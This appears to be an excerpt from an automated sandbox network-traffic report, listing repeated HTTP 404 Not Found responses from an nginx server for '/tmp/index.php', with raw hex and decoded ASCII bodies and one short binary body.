      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 12 Oct 2024 21:28:00 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 12 Oct 2024 21:28:01 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 12 Oct 2024 21:28:04 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 12 Oct 2024 21:28:06 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 12 Oct 2024 21:28:07 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 12 Oct 2024 21:28:08 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 00 00 d8 80 d7 bd 9d d9 a1 98 be 23 cd c5 88 81 99 8b 5c 36 59 39 08 a5 6c 5f b5 ac 17 bd cf b4 fe 6d 9f 3d d4 a1 72 0a 41 c2 8f 97 cb Data Ascii: #\6Y9l_m=rA
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 12 Oct 2024 21:28:11 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 12 Oct 2024 21:28:13 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 12 Oct 2024 21:28:14 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 12 Oct 2024 21:28:16 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 12 Oct 2024 21:28:17 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 12 Oct 2024 21:28:18 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 12 Oct 2024 21:28:20 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 12 Oct 2024 21:28:21 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 12 Oct 2024 21:28:23 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
